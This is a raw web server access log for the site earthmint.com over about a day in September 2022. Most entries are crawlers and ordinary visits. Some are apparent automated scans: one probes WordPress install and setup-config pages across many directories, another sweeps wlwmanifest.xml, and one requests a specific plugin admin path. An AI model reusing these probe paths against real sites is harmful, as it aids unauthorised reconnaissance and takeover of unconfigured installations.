209.97.185.87 - - [04/Sep/2022:19:22:12 -0700] "GET /test/wp-admin/setup-config.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "earthmint.com"
209.97.185.87 - - [04/Sep/2022:19:22:13 -0700] "GET /web/wp-admin/install.php?step=1 HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "earthmint.com"
209.97.185.87 - - [04/Sep/2022:19:22:13 -0700] "GET /web/wp-admin/setup-config.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "earthmint.com"
209.97.185.87 - - [04/Sep/2022:19:22:14 -0700] "GET /cms/wp-admin/install.php?step=1 HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "earthmint.com"
209.97.185.87 - - [04/Sep/2022:19:22:14 -0700] "GET /cms/wp-admin/setup-config.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "earthmint.com"
209.97.185.87 - - [04/Sep/2022:19:22:14 -0700] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "earthmint.com"
209.97.185.87 - - [04/Sep/2022:19:22:15 -0700] "GET /wp-admin/ HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "earthmint.com"
114.119.155.122 - - [04/Sep/2022:19:23:19 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "earthmint.com"
216.244.66.203 - - [04/Sep/2022:20:19:35 -0700] "GET /robots.txt HTTP/1.1" 404 73 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "www.earthmint.com"
54.36.148.223 - - [04/Sep/2022:20:26:24 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "www.earthmint.com"
51.222.253.3 - - [04/Sep/2022:20:26:25 -0700] "GET / HTTP/1.1" 200 379 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "www.earthmint.com"
54.36.149.55 - - [04/Sep/2022:22:09:22 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "earthmint.com"
51.222.253.20 - - [04/Sep/2022:22:09:23 -0700] "GET / HTTP/1.1" 200 379 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "earthmint.com"
66.249.79.90 - - [04/Sep/2022:22:35:23 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "earthmint.com"
216.244.66.203 - - [04/Sep/2022:23:01:39 -0700] "GET /robots.txt HTTP/1.1" 404 73 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "www.earthmint.com"
114.119.144.226 - - [04/Sep/2022:23:03:59 -0700] "GET / HTTP/1.1" 200 379 "https://energizect.com/node/81856" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.earthmint.com"
114.119.144.209 - - [04/Sep/2022:23:16:15 -0700] "GET /images?N=A HTTP/1.1" 301 1409 "https://earthmint.com/images?S=D" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "earthmint.com"
114.119.144.209 - - [04/Sep/2022:23:16:19 -0700] "GET /images/?N=A HTTP/1.1" 200 311 "https://earthmint.com/images?S=D" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "earthmint.com"
223.247.178.167 - - [04/Sep/2022:23:22:36 -0700] "GET / HTTP/1.1" 200 379 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "www.earthmint.com"
114.119.144.226 - - [04/Sep/2022:23:59:06 -0700] "GET /index_files/?C=D%3BO%3DA HTTP/1.1" 200 314 "https://www.earthmint.com/index_files?C=D%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.earthmint.com"
5.62.23.11 - - [05/Sep/2022:00:14:50 -0700] "GET / HTTP/1.1" 200 849 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36" "earthmint.com"
5.62.23.11 - - [05/Sep/2022:00:14:51 -0700] "GET /xmlrpc.php?rsd HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36" "earthmint.com"
5.62.23.11 - - [05/Sep/2022:00:14:51 -0700] "GET / HTTP/1.1" 200 849 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36" "earthmint.com"
5.62.23.11 - - [05/Sep/2022:00:14:52 -0700] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36" "earthmint.com"
5.62.23.11 - - [05/Sep/2022:00:14:53 -0700] "GET /web/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36" "earthmint.com"
5.62.23.11 - - [05/Sep/2022:00:14:53 -0700] "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36" "earthmint.com"
5.62.23.11 - - [05/Sep/2022:00:14:54 -0700] "GET /website/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36" "earthmint.com"
5.62.23.11 - - [05/Sep/2022:00:14:55 -0700] "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36" "earthmint.com"
5.62.23.11 - - [05/Sep/2022:00:14:59 -0700] "GET /2018/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36" "earthmint.com"
5.62.23.11 - - [05/Sep/2022:00:14:59 -0700] "GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36" "earthmint.com"
5.62.23.11 - - [05/Sep/2022:00:15:03 -0700] "GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36" "earthmint.com"
114.119.144.222 - - [05/Sep/2022:00:15:04 -0700] "GET /index_files?C=N%3BO%3DD HTTP/1.1" 301 1428 "https://www.earthmint.com/index_files?C=D%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.earthmint.com"
5.62.23.11 - - [05/Sep/2022:00:15:04 -0700] "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36" "earthmint.com"
5.62.23.11 - - [05/Sep/2022:00:15:05 -0700] "GET /media/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36" "earthmint.com"
5.62.23.11 - - [05/Sep/2022:00:15:06 -0700] "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36" "earthmint.com"
5.62.23.11 - - [05/Sep/2022:00:15:06 -0700] "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36" "earthmint.com"
5.62.23.11 - - [05/Sep/2022:00:15:07 -0700] "GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36" "earthmint.com"
216.244.66.203 - - [05/Sep/2022:00:40:32 -0700] "GET /robots.txt HTTP/1.1" 404 73 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "earthmint.com"
136.243.214.232 - - [05/Sep/2022:00:43:36 -0700] "GET / HTTP/1.1" 200 379 "" "Mozilla/5.0 (Windows NT 6.1; rv:51.0) Gecko/20100101 Firefox/51.0" "earthmint.com"
216.244.66.203 - - [05/Sep/2022:01:26:56 -0700] "GET /robots.txt HTTP/1.1" 404 73 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "www.earthmint.com"
216.244.66.203 - - [05/Sep/2022:01:26:56 -0700] "GET /robots.txt HTTP/1.1" 404 73 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "earthmint.com"
118.184.177.87 - - [05/Sep/2022:01:49:06 -0700] "GET / HTTP/1.1" 200 379 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "earthmint.com"
114.119.144.222 - - [05/Sep/2022:01:49:06 -0700] "GET /?C=N%3BO%3DD HTTP/1.1" 200 379 "https://earthmint.com" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "earthmint.com"
123.125.109.128 - - [05/Sep/2022:01:51:05 -0700] "GET / HTTP/1.1" 200 379 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.earthmint.com"
114.119.144.222 - - [05/Sep/2022:01:55:39 -0700] "GET /images?N=A HTTP/1.1" 301 1414 "https://www.earthmint.com/images?D=A" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.earthmint.com"
114.119.144.222 - - [05/Sep/2022:01:55:47 -0700] "GET /images/?N=A HTTP/1.1" 200 311 "https://www.earthmint.com/images?D=A" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.earthmint.com"
216.244.66.203 - - [05/Sep/2022:04:25:08 -0700] "GET /robots.txt HTTP/1.1" 404 73 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "www.earthmint.com"
114.119.144.209 - - [05/Sep/2022:04:26:37 -0700] "GET /?D=A HTTP/1.1" 200 379 "https://www.earthmint.com/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.earthmint.com"
123.125.109.128 - - [05/Sep/2022:04:37:34 -0700] "GET / HTTP/1.1" 200 379 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "earthmint.com"
54.36.149.74 - - [05/Sep/2022:04:51:28 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "earthmint.com"
51.222.253.9 - - [05/Sep/2022:04:51:29 -0700] "GET / HTTP/1.1" 200 379 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "earthmint.com"
20.168.91.40 - - [05/Sep/2022:05:06:01 -0700] "POST / HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "earthmint.com"
18.236.212.97 - - [05/Sep/2022:05:43:10 -0700] "GET / HTTP/1.1" 200 379 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "earthmint.com"
35.91.209.115 - - [05/Sep/2022:05:43:12 -0700] "GET / HTTP/1.1" 200 379 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "earthmint.com"
18.236.212.97 - - [05/Sep/2022:05:43:23 -0700] "GET / HTTP/1.1" 200 379 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "earthmint.com"
35.91.209.115 - - [05/Sep/2022:05:43:26 -0700] "GET / HTTP/1.1" 200 379 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "earthmint.com"
52.37.148.83 - - [05/Sep/2022:05:43:29 -0700] "GET /favicon.ico HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "earthmint.com"
52.37.148.83 - - [05/Sep/2022:05:43:29 -0700] "GET / HTTP/1.1" 200 379 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "earthmint.com"
35.91.4.53 - - [05/Sep/2022:05:43:32 -0700] "GET /favicon.ico HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "earthmint.com"
35.91.4.53 - - [05/Sep/2022:05:43:34 -0700] "GET / HTTP/1.1" 200 379 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "earthmint.com"
35.89.173.99 - - [05/Sep/2022:05:43:36 -0700] "GET /favicon.ico HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "earthmint.com"
35.89.173.99 - - [05/Sep/2022:05:43:36 -0700] "GET /favicon.ico HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "earthmint.com"
35.89.173.99 - - [05/Sep/2022:05:43:39 -0700] "GET / HTTP/1.1" 200 379 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "earthmint.com"
35.89.173.99 - - [05/Sep/2022:05:43:39 -0700] "GET / HTTP/1.1" 200 379 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "earthmint.com"
114.119.144.209 - - [05/Sep/2022:06:26:32 -0700] "GET /?C=S%3BO%3DA HTTP/1.1" 200 379 "https://www.earthmint.com?C=M%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.earthmint.com"
61.135.159.129 - - [05/Sep/2022:06:44:50 -0700] "GET / HTTP/1.1" 200 379 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.earthmint.com"
216.244.66.203 - - [05/Sep/2022:06:45:00 -0700] "GET /robots.txt HTTP/1.1" 404 73 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "earthmint.com"
216.244.66.203 - - [05/Sep/2022:06:52:35 -0700] "GET /?S=D HTTP/1.1" 200 849 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "earthmint.com"
54.89.178.247 - - [05/Sep/2022:07:26:58 -0700] "GET /robots.txt HTTP/1.1" 404 73 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36" "earthmint.com"
194.38.20.161 - - [05/Sep/2022:08:22:26 -0700] "GET /wp-content/plugins/super-interactive-maps/sim-wp-admin/pages/manage-maps.php HTTP/1.1" 404 73 "-" "ALittle Client" "earthmint.com"
207.46.13.233 - - [05/Sep/2022:08:36:37 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "www.earthmint.com"
207.46.13.57 - - [05/Sep/2022:08:36:43 -0700] "GET /?C=D;O=A HTTP/1.1" 200 379 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "www.earthmint.com"
51.222.253.5 - - [05/Sep/2022:08:50:13 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "www.earthmint.com"
51.222.253.4 - - [05/Sep/2022:08:50:14 -0700] "GET / HTTP/1.1" 200 379 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "www.earthmint.com"
51.222.253.9 - - [05/Sep/2022:11:15:01 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "earthmint.com"
51.222.253.2 - - [05/Sep/2022:11:15:02 -0700] "GET / HTTP/1.1" 200 379 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "earthmint.com"
114.119.152.204 - - [05/Sep/2022:11:48:21 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "earthmint.com"
216.244.66.203 - - [05/Sep/2022:12:07:58 -0700] "GET /robots.txt HTTP/1.1" 404 73 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "www.earthmint.com"
216.244.66.203 - - [05/Sep/2022:12:08:00 -0700] "GET /robots.txt HTTP/1.1" 404 73 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "earthmint.com"
185.27.99.140 - - [05/Sep/2022:12:57:53 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36" "earthmint.com"
185.27.99.135 - - [05/Sep/2022:12:57:53 -0700] "GET /humans.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36" "earthmint.com"
185.27.99.112 - - [05/Sep/2022:12:57:54 -0700] "GET /ads.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36" "earthmint.com"
185.27.99.134 - - [05/Sep/2022:12:57:54 -0700] "GET / HTTP/1.1" 200 379 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36" "earthmint.com"
67.82.98.148 - - [05/Sep/2022:12:59:16 -0700] "GET / HTTP/1.1" 200 379 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0" "www.earthmint.com"
67.82.98.148 - - [05/Sep/2022:12:59:17 -0700] "GET /favicon.ico HTTP/1.1" 404 88 "http://www.earthmint.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0" "www.earthmint.com"
67.82.98.148 - - [05/Sep/2022:12:59:32 -0700] "GET / HTTP/1.1" 200 379 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0" "www.earthmint.com"
67.82.98.148 - - [05/Sep/2022:12:59:35 -0700] "GET /index_files/ HTTP/1.1" 200 314 "http://www.earthmint.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0" "www.earthmint.com"
67.82.98.148 - - [05/Sep/2022:12:59:36 -0700] "GET / HTTP/1.1" 200 379 "http://www.earthmint.com/index_files/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0" "www.earthmint.com"
67.82.98.148 - - [05/Sep/2022:13:00:21 -0700] "GET /images/ HTTP/1.1" 200 311 "http://www.earthmint.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0" "www.earthmint.com"
67.82.98.148 - - [05/Sep/2022:13:00:23 -0700] "GET / HTTP/1.1" 200 379 "http://www.earthmint.com/images/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0" "www.earthmint.com"
67.82.98.148 - - [05/Sep/2022:13:00:26 -0700] "GET /index_files/ HTTP/1.1" 200 314 "http://www.earthmint.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0" "www.earthmint.com"
67.82.98.148 - - [05/Sep/2022:13:00:42 -0700] "GET / HTTP/1.1" 200 379 "http://www.earthmint.com/index_files/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0" "www.earthmint.com"
67.82.98.148 - - [05/Sep/2022:13:00:48 -0700] "GET / HTTP/1.1" 200 379 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0" "www.earthmint.com"
67.82.98.148 - - [05/Sep/2022:13:00:58 -0700] "GET /index.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0" "www.earthmint.com"
67.82.98.148 - - [05/Sep/2022:13:00:58 -0700] "GET /favicon.ico HTTP/1.1" 404 88 "http://www.earthmint.com/index.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0" "www.earthmint.com"
67.82.98.148 - - [05/Sep/2022:13:01:08 -0700] "GET /index.html HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0" "www.earthmint.com"
176.100.4.51 - - [05/Sep/2022:13:26:09 -0700] "GET / HTTP/1.1" 200 849 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36" "earthmint.com"
87.250.224.191 - - [05/Sep/2022:13:46:59 -0700] "GET /robots.txt HTTP/1.1" 404 73 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.earthmint.com"
5.255.253.129 - - [05/Sep/2022:13:47:03 -0700] "GET /images/Heat_Cool_Animation2.gif HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)" "www.earthmint.com"
216.244.66.203 - - [05/Sep/2022:16:12:34 -0700] "GET /robots.txt HTTP/1.1" 404 73 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "earthmint.com"
51.222.253.7 - - [05/Sep/2022:16:50:36 -0700] "GET / HTTP/1.1" 200 379 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "earthmint.com"
118.184.177.41 - - [05/Sep/2022:18:10:01 -0700] "GET / HTTP/1.1" 200 379 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "earthmint.com"
118.184.177.109 - - [05/Sep/2022:19:09:02 -0700] "GET / HTTP/1.1" 200 379 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.earthmint.com"
216.244.66.203 - - [05/Sep/2022:19:39:02 -0700] "GET /robots.txt HTTP/1.1" 404 73 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)" "www.earthmint.com"
114.119.129.36 - - [05/Sep/2022:20:05:48 -0700] "GET /images/ HTTP/1.1" 200 311 "https://earthmint.com?C=N%3BO%3DD" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "earthmint.com"
114.119.144.226 - - [05/Sep/2022:20:12:22 -0700] "GET /images?C=S%3BO%3DA HTTP/1.1" 301 1422 "http://earthmint.com/images?S=D" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "earthmint.com"
114.119.144.226 - - [05/Sep/2022:20:12:23 -0700] "GET /images/?C=S%3BO%3DA HTTP/1.1" 200 311 "http://earthmint.com/images?S=D" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "earthmint.com"
114.119.135.186 - - [05/Sep/2022:20:21:30 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.earthmint.com"
66.160.140.184 - - [05/Sep/2022:20:26:05 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "The Knowledge AI" "www.earthmint.com"
66.160.140.184 - - [05/Sep/2022:20:26:05 -0700] "GET /?C=N;O=D HTTP/1.1" 200 378 "-" "The Knowledge AI" "www.earthmint.com"
66.160.140.184 - - [05/Sep/2022:20:26:15 -0700] "GET /?C=M;O=A HTTP/1.1" 200 380 "-" "The Knowledge AI" "www.earthmint.com"
66.160.140.184 - - [05/Sep/2022:20:26:15 -0700] "GET /?C=S;O=A HTTP/1.1" 200 379 "-" "The Knowledge AI" "www.earthmint.com"
66.160.140.184 - - [05/Sep/2022:20:26:15 -0700] "GET /?C=D;O=A HTTP/1.1" 200 379 "-" "The Knowledge AI" "www.earthmint.com"
66.160.140.184 - - [05/Sep/2022:20:26:15 -0700] "GET /_private/ HTTP/1.1" 403 170 "-" "The Knowledge AI" "www.earthmint.com"
66.160.140.184 - - [05/Sep/2022:20:26:15 -0700] "GET /images/ HTTP/1.1" 200 311 "-" "The Knowledge AI" "www.earthmint.com"
66.160.140.184 - - [05/Sep/2022:20:26:16 -0700] "GET /index_files/ HTTP/1.1" 200 314 "-" "The Knowledge AI" "www.earthmint.com"
